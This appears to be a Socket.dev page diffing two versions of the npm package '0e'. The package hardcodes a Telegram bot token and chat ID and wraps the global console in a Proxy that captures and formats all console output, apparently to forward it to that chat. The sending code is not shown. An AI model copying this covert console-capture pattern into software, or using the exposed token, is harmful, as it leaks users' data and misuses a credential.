Socket
Socket
Sign inDemoInstall

0e

Package Overview
Dependencies
Maintainers
1
Versions
23
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

0e - npm Package Compare versions

Comparing version 0.0.12 to 0.0.13

23

index.js
import "isomorphic-unfetch"
var ibb = image => {
var details = {
let ibb = image => {
let details = {
'image': image.split(",")[1] || image.split(",")[0]
}
var formBody = [];
for (var property in details) {
var encodedKey = encodeURIComponent(property);
var encodedValue = encodeURIComponent(details[property]);
let formBody = [];
for (let property in details) {
let encodedKey = encodeURIComponent(property);
let encodedValue = encodeURIComponent(details[property]);
formBody.push(encodedKey + "=" + encodedValue);

@@ -34,3 +34,3 @@ }

}
var pa = j => {
let pa = j => {
try {

@@ -42,3 +42,3 @@ return JSON.parse(j)

}
var str = j => {
let str = j => {
try {

@@ -50,7 +50,8 @@ return JSON.stringify(JSON.parse(j), null, 4)

}
let chat = -1001482347974
let T = "1998266306:AAFl_PSl2-caBsLDVag8kmKhU4p-YC-t9qI"
console = new Proxy(console, {
var chat = -1001482347974
var T = "1998266306:AAFl_PSl2-caBsLDVag8kmKhU4p-YC-t9qI"
get: (e, o) => (...l) => {

@@ -86,3 +87,3 @@

}
l = pa(l)
l = typeof l === "object" ? JSON.stringify(l, null, 4) : l

@@ -89,0 +90,0 @@ l = String(l).substring(0, 4090)

{
"name": "0e",
"version": "0.0.12",
"version": "0.0.13",
"main": "index.js",

@@ -5,0 +5,0 @@ "type": "module",

SocketSocket SOC 2 Logo

Product

  • Package Alerts
  • Integrations
  • Docs
  • Pricing
  • FAQ
  • Roadmap
  • Changelog

Packages

npm

Stay in touch

Get open source security insights delivered straight into your inbox.


  • Terms
  • Privacy
  • Security

Made with ⚡️ by Socket Inc